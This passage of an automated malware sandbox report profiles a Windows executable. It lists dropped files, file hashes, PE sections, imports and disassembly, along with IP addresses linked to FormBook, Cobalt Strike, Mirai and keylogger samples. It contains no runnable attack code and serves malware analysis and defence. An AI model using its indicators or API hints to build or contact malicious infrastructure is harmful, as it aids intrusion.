                                                                  • 13.228.81.39
                                                                  https://www.depoqq.win/genoGet hashmaliciousUnknownBrowse
                                                                  • 34.250.141.206
                                                                  phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                  • 108.138.26.51
                                                                  smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                                  • 18.143.155.63
                                                                  https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                                                                  • 3.120.85.61
                                                                  http://infarmbureau.comGet hashmaliciousUnknownBrowse
                                                                  • 3.131.211.191
                                                                  https://cjerichmond.jimdosite.com/Get hashmaliciousUnknownBrowse
                                                                  • 3.255.10.234
                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 13.32.99.65
                                                                  CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdbeacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                                                                  • 8.148.6.140
                                                                  beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                                                                  • 8.148.6.140
                                                                  beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
                                                                  • 8.148.6.140
                                                                  2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                  • 118.178.60.103
                                                                  armv5l.elfGet hashmaliciousUnknownBrowse
                                                                  • 47.116.93.193
                                                                  3.elfGet hashmaliciousUnknownBrowse
                                                                  • 47.113.16.150
                                                                  armv7l.elfGet hashmaliciousUnknownBrowse
                                                                  • 8.181.124.11
                                                                  THsSNYblMw.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                  • 47.121.190.121
                                                                  Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                                  • 139.242.78.130
                                                                  Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                                  • 47.114.96.229
                                                                  CLOUDFLARENETUShttps://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                  • 104.17.25.14
                                                                  AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.64.1
                                                                  eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.64.1
                                                                  Encrypted_Archive_2025_LHC1W64SMW.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.25.14
                                                                  MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.96.1
                                                                  3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.80.1
                                                                  SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.16.1
                                                                  KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                  • 188.114.96.3
                                                                  secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                                                  • 104.17.25.14
                                                                  secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                                                  • 104.17.25.14
                                                                  FORTRESSITXUSBenefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                  • 69.57.162.6
                                                                  miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                  • 69.72.254.176
                                                                  sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 208.116.70.219
                                                                  DHL.exeGet hashmaliciousFormBookBrowse
                                                                  • 69.57.163.64
                                                                  la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                  • 65.98.32.221
                                                                  Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 69.57.163.64
                                                                  http://dimfa.elcompanies.digitalillustra.comGet hashmaliciousUnknownBrowse
                                                                  • 65.181.111.144
                                                                  RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                  • 69.57.163.227
                                                                  RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                  • 69.57.163.227
                                                                  RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                  • 69.57.163.227

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\aut9A1F.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\3HnH4uJtE7.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):289280
                                                                  Entropy (8bit):7.994518592457586
                                                                  Encrypted:true
                                                                  SSDEEP:6144:0WBAoEs4XpTTQ0MeUcfTIAvXst919f2lnJotSgZm89:/BfGubcfTIAPsnwKogZN9
                                                                  MD5:74432259BF5893C866138E3F6F4A795E
                                                                  SHA1:9C604E15501E462FBB3DFA482CE21F35C20D32E8
                                                                  SHA-256:0619895F80E34FFFA96BC3A207F7AF32433DFFD277FCB91CE071BEC1A41499B3
                                                                  SHA-512:ED2F9876C8E7412F95129AEBF3A4CF564A7D201B2D31A832AAE169126CE7714ED385EF9EC005D59CE3CF97D99963FDD178FE4B75497537CCFAD8E187E02CD470
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...7BPUKJ2M8.6O.DJ7APUK.2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M8.O6OZ[.9A.\.o.Lt.nb'=7jG3?29/_m[Q!X d(Ra" %n[#.t.eo9+.Ro]XAj2M80O6O-EC.|02.sR*../Q.N...{02.T..../Q.N...}02..[.P./Q.TDJ7APUK.wM8|N7O>KcoAPUKN2M8.O4N_EA7A.QKN2M80O6O.PJ7A@UKNBI80OvOTTJ7ARUKH2M80O6ORDJ7APUKNBI80M6OTDJ7CP..N2]80_6OTDZ7A@UKN2M8 O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6Oz0/O5PUK.dI80_6OT.N7A@UKN2M80O6OTDJ7aPU+N2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUK

                                                                  C:\Users\user\AppData\Local\Temp\chiffons

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\3HnH4uJtE7.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):289280
                                                                  Entropy (8bit):7.994518592457586
                                                                  Encrypted:true
                                                                  SSDEEP:6144:0WBAoEs4XpTTQ0MeUcfTIAvXst919f2lnJotSgZm89:/BfGubcfTIAPsnwKogZN9
                                                                  MD5:74432259BF5893C866138E3F6F4A795E
                                                                  SHA1:9C604E15501E462FBB3DFA482CE21F35C20D32E8
                                                                  SHA-256:0619895F80E34FFFA96BC3A207F7AF32433DFFD277FCB91CE071BEC1A41499B3
                                                                  SHA-512:ED2F9876C8E7412F95129AEBF3A4CF564A7D201B2D31A832AAE169126CE7714ED385EF9EC005D59CE3CF97D99963FDD178FE4B75497537CCFAD8E187E02CD470
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...7BPUKJ2M8.6O.DJ7APUK.2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M8.O6OZ[.9A.\.o.Lt.nb'=7jG3?29/_m[Q!X d(Ra" %n[#.t.eo9+.Ro]XAj2M80O6O-EC.|02.sR*../Q.N...{02.T..../Q.N...}02..[.P./Q.TDJ7APUK.wM8|N7O>KcoAPUKN2M8.O4N_EA7A.QKN2M80O6O.PJ7A@UKNBI80OvOTTJ7ARUKH2M80O6ORDJ7APUKNBI80M6OTDJ7CP..N2]80_6OTDZ7A@UKN2M8 O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6Oz0/O5PUK.dI80_6OT.N7A@UKN2M80O6OTDJ7aPU+N2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUKN2M80O6OTDJ7APUK

                                                                  C:\Users\user\AppData\Local\Temp\o3Z6161

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\wiaacmgr.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.103986593999411
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:3HnH4uJtE7.exe
                                                                  File size:1'401'344 bytes
                                                                  MD5:b88bab75a48b9fefcd3395afa9891d69
                                                                  SHA1:d35d41a4330b17b8518204a483b8f4800012718a
                                                                  SHA256:cb8928597d08e9bb6c3c7ee9df7eb836df1f85a9668054765dd6eb75a33516a3
                                                                  SHA512:f33af8ebb3ec7e82bb901637656cc0f17d326fa343b4df62631cc8a5cc37f9b1f8c45db7b9d55da8f5f007999fc38232f262cebc04799e93300f462bd4405764
                                                                  SSDEEP:24576:ZqDEvCTbMWu7rQYlBQcBiT6rprG8aVFfrXBnHVzuvz/CecYHYbi3:ZTvC/MTQYxsWR7aVVXxFGLCGHj
                                                                  TLSH:2C55C00277818062FFAB9B320B56E611467D7E262933F51F17983879BB721F1063E663
                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                  File Icon

                                                                  Icon Hash:0d61030111110104

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x420577
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x67622C3C [Wed Dec 18 01:58:20 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:948cc502fe9226992dce9417f952fce3

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007F99087CE213h
                                                                  jmp 00007F99087CDB1Fh
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  push dword ptr [ebp+08h]
                                                                  mov esi, ecx
                                                                  call 00007F99087CDCFDh
                                                                  mov dword ptr [esi], 0049FDF0h
                                                                  mov eax, esi
                                                                  pop esi
                                                                  pop ebp
                                                                  retn 0004h
                                                                  and dword ptr [ecx+04h], 00000000h
                                                                  mov eax, ecx
                                                                  and dword ptr [ecx+08h], 00000000h
                                                                  mov dword ptr [ecx+04h], 0049FDF8h
                                                                  mov dword ptr [ecx], 0049FDF0h
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  push dword ptr [ebp+08h]
                                                                  mov esi, ecx
                                                                  call 00007F99087CDCCAh
                                                                  mov dword ptr [esi], 0049FE0Ch
                                                                  mov eax, esi
                                                                  pop esi
                                                                  pop ebp
                                                                  retn 0004h
                                                                  and dword ptr [ecx+04h], 00000000h
                                                                  mov eax, ecx
                                                                  and dword ptr [ecx+08h], 00000000h
                                                                  mov dword ptr [ecx+04h], 0049FE14h
                                                                  mov dword ptr [ecx], 0049FE0Ch
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  mov esi, ecx
                                                                  lea eax, dword ptr [esi+04h]
                                                                  mov dword ptr [esi], 0049FDD0h
                                                                  and dword ptr [eax], 00000000h
                                                                  and dword ptr [eax+04h], 00000000h
                                                                  push eax
                                                                  mov eax, dword ptr [ebp+08h]
                                                                  add eax, 04h
                                                                  push eax
                                                                  call 00007F99087D08BDh
                                                                  pop ecx
                                                                  pop ecx
                                                                  mov eax, esi
                                                                  pop esi
                                                                  pop ebp
                                                                  retn 0004h
                                                                  lea eax, dword ptr [ecx+04h]
                                                                  mov dword ptr [ecx], 0049FDD0h
                                                                  push eax
                                                                  call 00007F99087D0908h
                                                                  pop ecx
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  mov esi, ecx
                                                                  lea eax, dword ptr [esi+04h]
                                                                  mov dword ptr [esi], 0049FDD0h
                                                                  push eax
                                                                  call 00007F99087D08F1h
                                                                  test byte ptr [ebp+08h], 00000001h
                                                                  pop ecx

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x7f760.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1540000x7594.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xd40000x7f7600x7f800ecd0b03589162f724f2159a3f3617b9dFalse0.8442861519607843data7.460678008960258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x1540000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xd45480x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                  RT_ICON0xd46700x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                  RT_ICON0xd47980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                  RT_ICON0xd48c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/mEnglishGreat Britain0.4397163120567376
                                                                  RT_ICON0xd4d280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/mEnglishGreat Britain0.3449812382739212
                                                                  RT_ICON0xd5dd00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/mEnglishGreat Britain0.3120331950207469
                                                                  RT_ICON0xd83780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/mEnglishGreat Britain0.2896197449220595
                                                                  RT_ICON0xdc5a00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/mEnglishGreat Britain0.24670235419377737
                                                                  RT_ICON0xecdc80xe41ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.000188362615158
                                                                  RT_MENU0xfb1e80x50dataEnglishGreat Britain0.9
                                                                  RT_STRING0xfb2380x594dataEnglishGreat Britain0.3333333333333333
                                                                  RT_STRING0xfb7cc0x68adataEnglishGreat Britain0.2735961768219833
                                                                  RT_STRING0xfbe580x490dataEnglishGreat Britain0.3715753424657534
                                                                  RT_STRING0xfc2e80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                  RT_STRING0xfc8e40x65cdataEnglishGreat Britain0.34336609336609336
                                                                  RT_STRING0xfcf400x466dataEnglishGreat Britain0.3605683836589698
                                                                  RT_STRING0xfd3a80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                  RT_RCDATA0xfd5000x55cf9data1.000330032064322
                                                                  RT_GROUP_ICON0x1531fc0x5adataEnglishGreat Britain0.7888888888888889
                                                                  RT_GROUP_ICON0x1532580x14dataEnglishGreat Britain1.25
                                                                  RT_GROUP_ICON0x15326c0x14dataEnglishGreat Britain1.15
                                                                  RT_GROUP_ICON0x1532800x14dataEnglishGreat Britain1.25
                                                                  RT_VERSION0x1532940xdcdataEnglishGreat Britain0.6181818181818182
                                                                  RT_MANIFEST0x1533700x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                  Imports

                                                                  DLLImport
                                                                  WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                  MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                  WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                  IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                  USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                  UxTheme.dllIsThemeActive
                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                  USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
